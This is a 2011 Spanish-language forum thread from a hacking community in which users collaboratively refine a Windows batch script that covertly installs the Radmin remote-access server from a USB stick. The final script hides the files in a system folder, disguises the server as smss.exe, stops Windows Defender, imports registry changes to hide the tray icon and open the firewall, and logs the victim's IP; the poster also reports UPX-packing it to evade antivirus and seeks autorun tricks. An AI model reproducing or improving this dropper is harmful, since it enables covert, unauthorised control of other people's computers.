Hack x Crack - Comunidad de Seguridad informática

Programación => Scripting => Batch / Bash => Mensaje iniciado por: Ratamalvada en Julio 01, 2011, 02:19:28 pm

Título: Como mejorar este código?
Publicado por: Ratamalvada en Julio 01, 2011, 02:19:28 pm
Hola, aqui tengo un código que hice para instalar el Radmin de manera oculta a traves de un USB.
Me gustaría que me ayudárais a añadirle alguna mejoras(en especial mrobles)
Código: [Seleccionar]
echo off
cls
if exist "%SystemRoot%\system32\drivers\system\R_server.exe" goto Explorer
set ruta=%SystemRoot%\system32\drivers\system
mkdir %ruta%
copy r_server.exe %ruta%
copy AdmDll.dll %ruta%
attrib +s +h +r %ruta%
attrib +s +h +r %ruta%\*.*
regedit /s reg.reg
%ruta%\r_server.exe /install /silence
%ruta%\r_server.exe /start
:EXPLORER
Explorer \
Me gustaría añadirle alguna cosa como que cerrara el proceso del [email protected]$ Defender o alguna manera de obtener la ip externa desde el mismo y poder enviarmela.
PD:Todo esto despues lo compilaré a exe
Gracias.
Título: Re:Como mejorar este código?
Publicado por: kinko89 en Julio 01, 2011, 05:02:02 pm
hola para cerrar procesos es taskkill /f /im proceso.exe
/f es para cierre forzoso.
/im nombre de imagen | Especifica el nombre de imagen del proceso que se va a terminar. Puede usarse el comodín '*' para especificar todas las tareas o nombres de imagen.
eso si az la ayuda de ese comandotaskkill /? si no sabes el nombre del proceso buscalo en la red lo tipico el como mejorar el codigo tendria que mirarlo un poco mas.
Para la Ip externa pon tracert www.google.es la web puedes cambiarla.
tracert lo que hace es decirte por cuantos routers salta para llegar al destino el primero suele ser el tipico 192.168.1.1 que es el de router el segundo es tu IP o la ip de la victima si le has infectado el ordenador.
poniendolo en un tracert www.google.es > txt.txt se te creara el txt eso si tendras que buscar como enviarte ese archivo a tu correo.
 Espero que esto te valga
Título: Re:Como mejorar este código?
Publicado por: Ratamalvada en Julio 01, 2011, 10:06:17 pm
Gracias Kinko, lo de tracert no lo había pensado, pero lo pongo y no me da mi ip externa, me sale otra muy parecida, pero que no es.
En cuanto a lo de taskkill ya lo sabía, pero al ponerlo no me lo ejecuta porque creo que no lo puedo ejecutar despues de ejecutar r_server.exe, y si lo pongo antes de él no se me ejecuta r_server.exe...
así que haber si encuentro algo...
Título: Re:Como mejorar este código?
Publicado por: 2Fac3R en Julio 02, 2011, 12:18:42 am
Haz el code completo como pensarias dejarlo y te ayudamos a mejorarlo ;).

Edito:

Suponiendo que vas a ejecutarlo de forma "escondida" con el AutoRun. Creo que aun te falto leer mas de las revistas, ya que aca lo tienes con una dll y el exe, al final del ejercicio de la revista quedamos con 2 dll`s que podemos ejecutar juntos con un code, te recomendaria hacerlo asi.

Tengo la duda de esta linea:

Código: [Seleccionar]
regedit /s reg.regDisculpa mi ignorancia ;D

Para las demas ideas te recomiendo busques algo sobre "Net stop" o "Net start" ya sabras que son muy utiles.
Zalu2
Título: Re:Como mejorar este código?
Publicado por: Ratamalvada en Julio 02, 2011, 03:07:13 pm
Haz el code completo como pensarias dejarlo y te ayudamos a mejorarlo ;).

Edito:

Suponiendo que vas a ejecutarlo de forma "escondida" con el AutoRun. Creo que aun te falto leer mas de las revistas, ya que aca lo tienes con una dll y el exe, al final del ejercicio de la revista quedamos con 2 dll`s que podemos ejecutar juntos con un code, te recomendaria hacerlo asi.

Tengo la duda de esta linea:

Código: [Seleccionar]
regedit /s reg.regDisculpa mi ignorancia ;D

Para las demas ideas te recomiendo busques algo sobre "Net stop" o "Net start" ya sabras que son muy utiles.
Zalu2
regedit /s reg.reg importa de manera silenciosa al registro el archivo reg.reg, que está configurado a mi gusto, como que no muestre icono en es systray y demás. También añade una excepción al Firewall de Windows XP, pero el de Vista no se en que clave se guarda... :-\
Claro que conozco Net start y stop, pero no había caido en eso, gracias.
Voy a mirar eso que dices de las 2 dll's en la revista y pongo el código final.
Thanks.
Título: Re:Como mejorar este código?
Publicado por: 2Fac3R en Julio 02, 2011, 07:50:38 pm
regedit /s reg.reg importa de manera silenciosa al registro el archivo reg.reg, que está configurado a mi gusto, como que no muestre icono en es systray y demás. También añade una excepción al Firewall de Windows XP, pero el de Vista no se en que clave se guarda... :-\
Claro que conozco Net start y stop, pero no había caido en eso, gracias.
Voy a mirar eso que dices de las 2 dll's en la revista y pongo el código final.
Thanks.

Vaya cada dia se aprenden cosas nuevas  ;D, suerte con tu codigo y cuando tengas terminado postealo y te damos algunas ideas para mejorarlo  ;)
Zalu2
Título: Re:Como mejorar este código?
Publicado por: Ratamalvada en Julio 02, 2011, 10:34:06 pm
El codigo final queda así:
Código: [Seleccionar]
if exist "%SystemRoot%\system32\drivers\system\smss.exe" goto instalado
set ruta=%SystemRoot%\system32\drivers\system
mkdir %ruta%
net stop "Windows Defender"
copy smss.exe %ruta%
copy AdmDll.dll %ruta%
attrib +s +h +r %ruta%
attrib +s +h +r %ruta%\*.*
regedit /s system\reg.reg
%ruta%\smss.exe /install /silence
%ruta%\smss.exe /start
tracert -h 3 www.google.es>%ruta%\ip.log
copy %ruta%\ip.log \log.pot
:instalado
explorer \
exit
:END
explorer \
exit
este código lo he pasado a exe y como me lo detectaba el antivirus lo he empaquetado con UPX(el ejecutable), y lo he copiado a un pen, pero ahora me surge otra duda, ya que veo que el autorun.inf en Vista no me funciona, así que si saben alguna manera, diganmela...
Tambien acepto sugerencias para mejorar el código, por supuesto...